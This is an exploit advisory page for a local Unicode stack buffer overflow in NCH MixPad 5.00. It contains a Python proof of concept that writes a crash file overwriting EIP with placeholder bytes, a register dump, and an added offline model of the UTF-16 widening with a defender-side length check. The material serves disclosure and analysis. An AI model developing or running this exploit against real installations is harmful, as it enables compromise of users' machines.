MixPad 5.00 Buffer Overflow

2018.01.23
Credit: bzyo
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: NCH Software MixPad v5.00 - Unicode Buffer Overflow
# Date: 21-01-2017
# Vulnerable Software: NCH Software MixPad
# Vendor Homepage: http://www.nch.com.au/mixpad
# Version: v5.00
# Software Link: http://www.nch.com.au/mixpad/mpsetup.exe
# Tested On: Windows XP
#
#
# PoC: generate crash.txt, options, metronome tab, paste crash.txt in 'choose a custom metronome sound'
#
# no unicode jmp/call to esp
#
# EAX 00117700
# ECX 001167F0
# EDX 7C90E514 ntdll.KiFastSystemCallRet
# EBX 00000000
# ESP 00116C40 UNICODE "BBBBBB does not exist or cannot be accessed."
# EBP 00116FAC
# ESI 0000004E
# EDI 00117740
# EIP 00CC00CC

filename = "crash.txt"

junk = "A"*251
eip = "\xcc"*2    # eip over; jmp/call esp goes here
fill = "B"*100    # only 6 used in esp

buffer = junk + eip + fill

textfile = open(filename, 'w')
textfile.write(buffer)
textfile.close()
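The register dump above shows why this is a Unicode overflow rather than a plain one: the two 0xCC marker bytes end up in EIP as 00CC00CC, because the application widens the pasted ANSI path to UTF-16LE before copying it into the undersized stack buffer, so every byte is stored as byte,0x00. The following added example (not part of bzyo's PoC) models that widening offline and recovers the EIP value from the crash buffer; the widening function is an assumption about the conversion the application performs, and the wide-buffer capacity in the check helper is a hypothetical figure used only to illustrate that a length bound has to be applied after widening, not to the ANSI length the user typed.

```python
"""Model of the ANSI->UTF-16LE widening behind the 00CC00CC EIP value.

Added example; reproduces the offsets of the advisory's crash buffer
(251 bytes of 'A', two 0xCC bytes, 100 bytes of 'B') without touching MixPad.
"""

JUNK_LEN = 251            # offset to the saved return address, from the PoC
EIP_MARKER = b"\xcc\xcc"  # the two bytes the PoC places over EIP
FILL_LEN = 100            # trailing bytes, of which the crash shows only 6 at ESP


def widen_to_utf16le(data: bytes) -> bytes:
    """Assumed conversion: each 8-bit byte becomes the 16-bit LE code unit
    with the same value followed by 0x00 (latin-1 maps bytes 1:1 to U+00xx)."""
    return data.decode("latin-1").encode("utf-16-le")


def build_crash_buffer(junk_len: int = JUNK_LEN,
                       marker: bytes = EIP_MARKER,
                       fill_len: int = FILL_LEN) -> bytes:
    """Constructed copy of the advisory's buffer layout (junk + eip + fill)."""
    return b"A" * junk_len + marker + b"B" * fill_len


def eip_after_widening(buf: bytes, junk_len: int = JUNK_LEN) -> int:
    """Return the little-endian dword that lands on the saved return address
    once the buffer has been widened: the ANSI offset doubles, and the two
    marker bytes become cc 00 cc 00, which reads back as 0x00CC00CC."""
    wide = widen_to_utf16le(buf)
    offset = junk_len * 2
    return int.from_bytes(wide[offset:offset + 4], "little")


def exceeds_wide_capacity(buf: bytes, wide_capacity_bytes: int) -> bool:
    """Defender-side check: the bound must be applied to the widened size,
    not to len(buf). wide_capacity_bytes is a hypothetical stack-buffer size;
    the real size inside MixPad is not stated in the advisory."""
    return len(widen_to_utf16le(buf)) > wide_capacity_bytes


if __name__ == "__main__":
    crash = build_crash_buffer()
    print("ANSI length: %d, widened length: %d" % (len(crash), len(widen_to_utf16le(crash))))
    print("dword over EIP after widening: 0x%08X" % eip_after_widening(crash))
```

Two consequences fall out of the model. First, the attacker only controls every other byte in memory, which is why the comments note there is no usable Unicode-compatible jmp/call esp: the address would have to be of the form 00xx00yy. Second, a length check performed on the typed ANSI string (253 characters here) undercounts by half, since 506 bytes reach the stack; any input validation added by a vendor must measure the widened form.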


Copyright 2018, cxsecurity.com
